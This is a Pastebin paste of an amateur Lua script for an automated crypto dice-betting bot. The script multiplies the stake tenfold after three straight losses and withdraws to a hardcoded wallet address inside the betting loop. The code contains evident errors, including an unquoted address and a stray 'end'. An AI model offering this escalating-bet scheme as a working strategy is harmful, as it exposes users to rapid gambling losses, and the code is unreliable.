Advertisement
coinwalk

lolthis awesome

Feb 16th, 2020
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. lol = balance/10000
  2. chance = 49
  3. nextbet = lol
  4. cox = 4
  5. box = 0
  6. bit = 0
  7. good = 12
  8. shit = balance*1.1
  9. function dobet()
  10. if win then
  11. box = 0
  12. bit +=1
  13. else
  14. box +=1
  15. bit = 0
  16. end
  17. if (box == 3) then
  18. nextbet = previousbet*10
  19. box = 0
  20. end
  21. if (bit == 3) then
  22. nextbet = balance/10000
  23. bit = 0
  24. end
  25. if balance > shit and win then
  26. nextbet = balance/10000
  27. shit = balance*1.1
  28. end
  29. if balance > good then
  30. stop()
  31. end
  32. withdraw (cox,DFy5pT5xNkfPJC32DAddFW8H2c47usFfLB)
  33. end
  34. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement